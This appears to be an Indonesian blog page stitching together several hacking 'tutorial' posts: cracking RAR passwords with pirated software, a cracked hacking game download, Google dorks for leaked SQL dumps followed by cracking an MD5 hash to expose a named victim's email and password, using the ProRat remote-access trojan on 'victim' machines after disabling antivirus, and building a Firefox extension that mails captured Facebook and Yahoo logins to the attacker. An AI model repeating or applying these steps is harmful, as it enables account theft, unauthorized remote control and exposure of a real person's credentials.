Mungkin sebagian orang yang pernah mendownload file berformat .rar yang ternyata file-nya diberi password dan password-nya tidak diberitahu pasti anda sangat kesal. Seperti pengalaman-pengalaman saya, saya juga sering mendapat file .rar yang setelah selesai saya download ternyata dipassword, mending kalau file-nya hanya berukuran 1-10Mb, tapi file-nya antara 50-100Mb. Udah nunggu sabar-sabar sampai kedownload tuntas, eh setelah selesai kedownload semua malah dipassword file-nya.

Baiklah, Saya ada solusi nih... Ya meskipun tidak selalu dapat membantu.. Tapi berdasarkan pengalaman saya, saya selalu menemukan password-nya dengan kedua cara berikut :

1. Gunakan software rar recovery

 klik disini untuk download File-nya sudah dilengkapi dengan crack-nya. Di software ini terdapat file yang menyimpan sekitar 4.000 password lebih yang akan dicoba pada file .rar Anda yang diberi password. Memang siih waktu scanning-nya cukup lama.. Scanning-nya per-detik yaitu 17 password dan jumlah password-nya lebih dari 4.000 password. Jadi 4.000 : 17 : 60 (menit)= +/- 45 Menit untuk scanning sampai selesai. Yah mau gimana lagi?! tunggu aja yang sabar siapa tau saja password-nya memang benar ketemu.

2. Dengan teknik keyword search engine Google. Yang penting, setelah sobat selesai download-nya, sobat jangan merename atau mengganti nama file-nya, semisal sobat download file-nya yang didapat dengan nama "I-M-P-E-L-L-I-T-T-E-R-I.VictimOfTheSystemJapan.MET.rar", nah sobat jangan mengganti nama-nya. Tapi coba tambahkan kode "+pass" tanpa tanda kutip. Jadi-nya seperti ini :

I-M-P-E-L-L-I-T-T-E-R-I.VictimOfTheSystemJapan.MET.rar+pass
Dan sekarang masukkan kode atau tulisan di atas di search engine Google dan klik search atau enter. Maka akan keluar Web/Blog yang memberikan informasi yang berkaitan dengan keyword itu.

Hacker Evolution Untold 2.01.049 (2010) merupakan sebuah game simulator atau lebih tepatnya lagi game simulasi hacking. Dalam game inianda akan diberikan misi-misi dalam dunia hacking. Misalnya mencuri data, menyebarkan virus, mentransfer uang, dan sebagainya. Namun game ini bukan untuk alat pembelajaran dalam dunia kejahatan lho. Gunakan dengan bijak barangkali suatu saat nanti berguna.

Dalam game ini anda dituntut dapat berpikir secepat mungkin, setepat mungkin, dan seteliti mungkin. Jika anda pemula seperti saya, anda bisa mencari tutorialnya di Google. Karena memang game ini cukup menantang juga lho. Hehehe
Screenshot :

* Download | Hacker Evolution Untold 2.01.049 - (62 MB)
* Download | Crack Hacker Evolution Untold 2.04.049 - (1 KB)
* Password : dytoshare

Oia, Crack hanya di copy paste ke direktori Install. Bukan untuk dijalankan atau ditambahkan ke registry. Ambil nilai positifnya, jangan disalahgunakan ya? Hehehe.
Semoga Bermanfaat

Hacking Email – Hotmail Yahoo Gmail

Assalamualaikum
Ane cuma mau share tutor cupu nih,…
Cuma share aja ,…..
Berikut POC + PICT nya jadi gak ada yang protes minta POC sama PICT
Btw langsung saja ke TKP :
Hari ini ane akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita.
Persyaratan:
Google Dorks:

Terbitkan Entri

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com intextpassword
Quote:ext:sql intext:@hotmail.com
Online Hash Cracker:http://md5crack.com/
Ok mari kita mulai:
Mari kita pergi ke http://www.google.com dan copy paste kan dork yang ane share,…..dan cari salah satu situs di sana buat korban

Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash

Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d
Kita buka MD5 Cracker Hash, Bisa Disini: http://md5crack.com , atau anda bisa cari di google tools untuk Crack MD5 password, banyak bertebaran.
Kemudian masukkan hashnya ke tools MD5 online Cracker, jadi seperti gambar berikut:

Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo. com.cn
Password: 19920707
Ets, bersenang-senang dan menikmati akun tak terbatas ,…btw jgn hack email ane yahh cuma numpang share aja kok ,…
Tutor nya jga baru ane pelajari jadi jika ada yang salah maafin yoo..

Trick Hacker Mengendalikan Komputer Orang

Meremote komputer, inilah yang sangat digemari oleh orang awam seperti saya ini.
Meremote komputer disini maksudnya adalah mengendalikan komputer jarak jauh dengan komputer yang berbeda. Jadi kita bisa melakukan aktivitas untuk menggunakan mouse dan keyboard dengan lokasi komputer yang berbeda. Misalnya Anda ingin mengendalikan komputer kantor dari komputer/laptop di rumah hanya dengan koneksi internet.
yang dibutuhkan, hanyalah :

1. Tool Advanced Ports Scanner
Tool ini hanya dibutuhkan untuk mengetahui alamat IP dan Port sang korban.
bisa di sini
2. Tool Prorat
Aplikasi inilah yang bisa digunakan untuk meremote komputer orang lain. kunjungi disitus resminya http://www.prorat.net untuk tool ini bisa anda download langsung klik disini
password rar : “pro”

Sebelumnya dimatikan dulu Anti Virus kamu (disable) untuk menggunakan tool ProRat ini, karena ProRat akan terdeteksi sebagai virus. Padahal dia tidak berbahaya bagi komputer kita.

Mettzz Mencobaa.....

Hack Facebook, Yahoo, Hotmail dengan Firefox Sniffer

Untuk membuat Firefox Sniffer kita membutuhkan :

1. File FFSniffer.rar (dalam bentuk kompres .rar)
bisa di download disini
2. Master python 2.65
Pertama-tama kita harus menginstal python 2.65
setelah terinstal kita buka folder FFSniffer hasil dari FFSniffer.rar
klik dua kali file pkg_creator.py
Isi pertanyaan pertama dengan email anda.
Isi pertanyaan kedua dengan subyek dari email.
setelah selesai akan muncul file bernama flash.xpi

Cara menginstal flash.xpi pada browser (firefox)
1. buka browser firefox
2. klik file/berkas -> bukaberkas/open
3. cari flash.xpi kemudian klik ok/open
4. klik allow kemudian pilih tunggu beberapa saat kemudian klik install
5. klik restart firefox.

Cara melihat apakah Firefox sniffer sudah aktif atau tidak:
1. buka firefox kemudian buka facebook/yahoo/bebo/myspace dan lain-lain
2. login
3. buka email anda dan lihat folder inbox / spam / junk
4. selamat mencoba

selesai...